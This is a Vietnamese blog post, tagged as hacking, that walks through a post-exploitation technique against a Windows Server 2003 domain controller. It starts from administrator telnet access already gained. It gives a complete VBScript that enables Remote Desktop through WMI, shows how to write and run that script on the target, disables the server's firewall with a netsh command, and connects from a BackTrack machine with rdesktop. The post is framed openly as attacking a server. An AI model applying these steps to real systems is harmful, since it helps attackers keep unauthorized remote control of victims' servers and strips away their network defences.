Trao đổi với tôi

http://www.buidao.com

12/9/09

[Hacking] BẬT TÍNH NĂNG REMOTE DESKTOP TỪ XA

Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên.

Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3

B1. Trên Server kiểm tra remote desktop chưa bật.

picture001

B2. Trên máy Attacker, telnet vào Server

picture002

B3. Chuẩn bị sẵn file VBscript để enable Remote Desktop

picture003

Nội dung file VBScript remote.vbs

machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ' 0=off, 1=on


set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )

for each item in items

item.SetAllowTSConnections( value_to_set )

next

B4. Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server. Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại.

picture004

B5. Dùng lệnh dir kiểm tra

picture005

B6. Chạy file remote.vbs để bật remote desktop.

picture006

B7. Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe. (3389 là port Remote desktop)

picture007

B8. Trên Server kiểm tra tính năng Remote Desktop đã được bật

picture008

B9. Tắt firewall của Server

Sử dụng lệnh : Netsh firewall set opmode disable

picture009

B10. Từ máy attacker, chạy remote desktop client để kết nối với Server.

Sử dụng lệnh rdesktop [hostname]

picture010

B11. Nhập username/password của Administrator

picture011

B12. Truy cập thành công với quyền Administrators

picture012

Have a nice day smile_wink

Link: http://daoduyhieu.spaces.live.com/?_c11_BlogPart_BlogPart=blogview&_c=BlogPart&partqs=cat%3dHACKING%2520-%2520SECURITY